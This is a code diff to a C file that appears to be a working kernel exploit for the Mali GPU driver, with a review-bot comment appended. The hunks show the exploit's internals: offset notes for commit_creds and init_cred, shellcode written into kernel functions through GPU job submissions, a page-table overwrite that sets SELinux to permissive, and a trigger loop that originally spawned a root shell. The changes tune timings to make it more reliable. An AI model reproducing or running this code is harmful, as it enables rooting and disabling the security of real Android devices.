diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c
index c4f8b73..b43f631 100644
--- a/mali_shrinker_mmap32.c
+++ b/mali_shrinker_mmap32.c
@@ -76,8 +76,8 @@ Search: sel_read_enforce -> SELINUX_ENFORCING = ldr - KERNEL_BASE
 Need: ARM to HEX
-ADD_COMMIT = add x8, x8, #0x(Last 3 digits of INIT_CRED)
 ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED)
+ADD_COMMIT = add x8, x8, #0x(Last 3 digits of COMMIT_CRED)
 */
 /*
@@ -181,8 +181,8 @@ static uint64_t selinux_enforcing;
 //static uint64_t avc_deny = 0x2CCC28;
 static uint64_t avc_deny;
-static uint64_t selinux_enforcing_READ = 0X0;
-static uint64_t selinux_enforcing_WRITE = 0X0;
+static uint64_t selinux_enforcing_READ = 0x0;
+static uint64_t selinux_enforcing_WRITE = 0x0;
 /* Overwriting SELinux to permissive
 strb wzr, [x0]
@@ -634,7 +634,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e
 if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
 err(1, "submit job failed\n");
 }
-usleep(300000);
+usleep(100000);
 }
 void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, uint64_t value, enum mali_write_value_type type) {
@@ -651,7 +651,7 @@ void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, u
 LOG("write_data overwrite addr : %llx %llx\n", overwrite_addr + data_offset, data_offset);
 curr_overwrite_addr = overwrite_addr;
 write_to(mali_fd, overwrite_addr + data_offset, value, atom_number++, type);
-usleep(300000);
+usleep(100000);
 }
 }
 }
@@ -659,7 +659,7 @@ void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, u
 void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
 printf("write_func called with code_size = %llu\n", code_size);
-usleep(300000);
+usleep(100000);
 uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
 uint64_t curr_overwrite_addr = 0;
 for (int i = 0; i < size; i++) {
@@ -675,7 +675,7 @@ void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, u
 for (int code = code_size - 1; code >= 0; code--) {
 write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
 }
-usleep(300000);
+usleep(100000);
 }
 }
 }
@@ -684,7 +684,7 @@ void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, u
 int run_enforce() {
 char result = '2';
 printf("run_enforce: before sleep\n");
-sleep(3);
+sleep(2);
 printf("run_enforce: after sleep\n");
 int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY);
 printf("run_enforce: open\n");
@@ -712,7 +712,7 @@ int run_enforce_write() {
 int run_enforce_un() {
 char result = '2';
 printf("run_enforce_un: before sleep\n");
-sleep(3);
+sleep(2);
 printf("run_enforce_un: after sleep\n");
 int enforce_fd = open("/sys/fs/selinux/deny_unknown", O_RDONLY);
 printf("run_enforce_un: open\n");
@@ -803,7 +803,7 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved)
 uint64_t selinux_enforcing_addr = (((selinux_enforcing + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
 write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), selinux_enforcing_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
-usleep(300000);
+usleep(100000);
 // Go through the reserve pages addresses to write to avc_denied with our own shellcode
 write_data(mali_fd2, selinux_enforcing, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, 0, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
 }
@@ -947,7 +947,7 @@ int main() {
 int flush_idx = 0;
 for (int i = 0; i < 10; i++) {
 if(!trigger(mali_fd, mali_fd2, &flush_idx)) {
-system("sh");
+system("getenforce");
 break;
 }
 }
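Review bot: `system("getenforce")` in the last hunk hands the command to `/bin/sh -c`, resolves the binary through whatever PATH the process inherited, and its return value is discarded, so the new line neither controls what actually runs nor learns whether it ran. The file already opens `/sys/fs/selinux/enforce` directly in `run_enforce` (visible in the -684 hunk), so reading that one byte in place of spawning a shell would report the same status without the indirection; if an external command is kept, `execlp`/`posix_spawn` with an explicit argv and a checked exit status is the usual replacement for `system()`. `main` begins before this hunk and continues past it, so the surrounding error handling could not be checked.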